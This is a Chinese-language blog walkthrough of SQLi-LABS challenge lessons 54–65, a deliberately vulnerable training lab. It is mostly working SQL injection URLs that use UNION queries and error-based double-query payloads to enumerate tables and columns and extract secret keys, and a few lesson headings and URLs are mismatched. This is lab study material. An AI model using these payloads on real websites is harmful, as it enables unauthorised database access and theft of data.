SQLi-LABS Page-4 (Challenges) less 54-75注入教程

2019年6月9日 280次阅读 来源: 极客资源君

Lesson – 54 GET – Challenge – Union – 10 queries allowed – Variation 1 给你十次测试机会找到key,超了重来,构造“?id=1′ order by 3”
http://sql/Less-54/index.php?id=-1%27union%20select%201,2,database()%23
http://sql/Less-54/index.php?id=-1%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22%23爆出字段名为“znkf1mw1w8”这里是随机的
http://sql/Less-54/index.php?id=-1%27union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%22challenges%22%20and%20table_name=%22znkf1mw1w8%22%23 通过limit 爆出id,sessid,secret_PIRC,tryy
http://sql/Less-54/index.php?id=-1'union select 1,2,secret_PIRC from znkf1mw1w8 %23 最后在secret_PIRC里面取出key:qKGAzqon0W2QMS9v2FseUyQP 答案key是随机的,每次不一样的,还是挺有意思的

Lesson – 55

GET – Challenge – Union – 14 queries allowed
Variation 2
试了好几次才发现闭合的是括号
http://sql/Less-55/index.php?id=1)%20and%201=1%20%23
http://sql/Less-55/index.php?id=-1)%20union%20select%201,database(),3%23选择database
http://sql/Less-55/index.php?id=-1)%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22%23,得到fx6gbr241y,
http://sql/Less-55/index.php?id=-1)%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%22challenges%22%20and%20table_name=%22fx6gbr241y%22%20%23继续爆出id,sessid,secret_2H0L
http://sql/Less-54/index.php?id=-1'union select 1,2,secret_2H0L from fx6gbr241y %23
后面都一样了得到HI88e74wIfhSuJUojsPZTiup

Lesson – 56 GET – Challenge – Union – 14 queries allowed – Variation 3
·http://sql/Less-56/?id=1%27)%23试出来是‘’)’的构造http://sql/Less-56/?id=-1') union select 1,2,table_name from information_schema.tables where table_schema="challenges"%23得到ccve4hzkwa
http://sql/Less-56/?id=-1') union select 1,2,column_name from information_schema.columns where table_schema="challenges" and table_name="ccve4hzkwa" %23 爆出id,sessid,secret_PSBF,http://sql/Less-56/?id=-1') union select 1,2,secret_PSBF from ccve4hzkwa %23成功

Lesson – 57 GET – Challenge – Union – 14 queries allowed – Variation 4
http://sql/Less-57/?id=1%22成功测试存在注入点,剩下的就不做了,反正方法都一样。

Lesson – 58 GET – challenge – Double Query – 5 queries allowed – Variation 1
http://sql/Less-58/index.php?id=1%27and%20%271%27=%271,在这一题中测了好久才知道与前面不一样的是loginname和username,俩个不一样的表,所以在测试时靠loginname是没用的,幸亏还有报错显示,可以用双注入查询。http://sql/Less-58/index.php?id=-1' union select 1 from (select+count(*),concat(( database()),floor(rand(0)*2))a from information_schema.tables group by a)b %23爆出“
Duplicate entry ‘challenges1’ for key ‘group_key’ ”那么就可以得到challenges,http://sql/Less-58/index.php?id=-1%27%20union%20select%201,2,3%20from%20(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23得到表“d7dne5tfys”
http://sql/Less-58/index.php?id=-1%27%20union%20select%201,2,3%20from%20(select%20count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%22d7dne5tfys%22%20limit%202,1),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23 b爆出Duplicate entry ‘secret_UZ0Q1’ for key ‘group_key’剩下的就简单了http://sql/Less-58/index.php?id=-1' union select 1,2,3 from (select count(*),concat((select secret_UZ0Q1 from challenges.d7dne5tfys),floor(rand(0)*2))a from information_schema.tables group by a)b #在这里需要记住,username和loginname是不一样的库里面的,所以要拿出challenge的数据,需要用challenges.d7dne5tfys表示~~

Lesson – 59 GET – challenge – Double Query – 5 queries allowed – Variation 2 方法是一样的,就不再重复了
http://sql/Less-59/index.php?id=-1 union select 1 from (select+count(*),concat(( database()),floor(rand(0)*2))a from information_schema.tables group by a)b %23

Lesson – 60 GET – challenge – Double Query – 5 queries allowed – Variation 3
http://sql/Less-60/?id=1%22通过这个发现周围如何构造,http://sql/Less-60/?id=-1%22)%20union%20select%201%20from%20(select+count(*),concat((%20database()),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23那么接下来继续用双查询注入成功get challenge,剩下的自己做吧

Lesson – 61 GET – challenge – Double Query – 5 queries allowed – Variation 4
输入http://sql/Less-61/?id=1%27提示”check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”)) LIMIT 0,1′ at line 1″由此判断周围,”http://sql/Less-61/index.php?id=1%27))%23http://sql/Less-61/index.php?id=-1%27))%20union%20select%201%20from%20(select+count(*),concat((%20select%20database()),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23剩下的自己做吧,都一样。

Lesson – 63 GET – challenge – Blind – 130 queries allowed – Variation 2 http://sql/Less-62/?id=1%27)%20order%20by%203%23通过这个得到注入点,只能盲注一个个查询了

Lesson – 63 GET – challenge – Blind – 130 queries allowed – Variation 2
http://sql/Less-63/?id=1%27%23对的
http://sql/Less-63/?id=1%27)%23错的
注入点知道啦,过程略

Lesson – 64 GET – challenge – Blind – 130 queries allowed – Variation 3
http://sql/Less-64/?id=1"))%23错的
http://sql/Less-64/?id=1))%23对的
得到注入点啦,过程略

Lesson – 65 GET – challenge – Blind – 130 queries allowed – Variation 4
http://sql/Less-65/?id=1%22%23错的
http://sql/Less-65/?id=1%22)%23对的
过程略

后面的题目。。。。。没了

    原文作者:极客资源君
    原文地址: https://www.jianshu.com/p/e00746284696
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞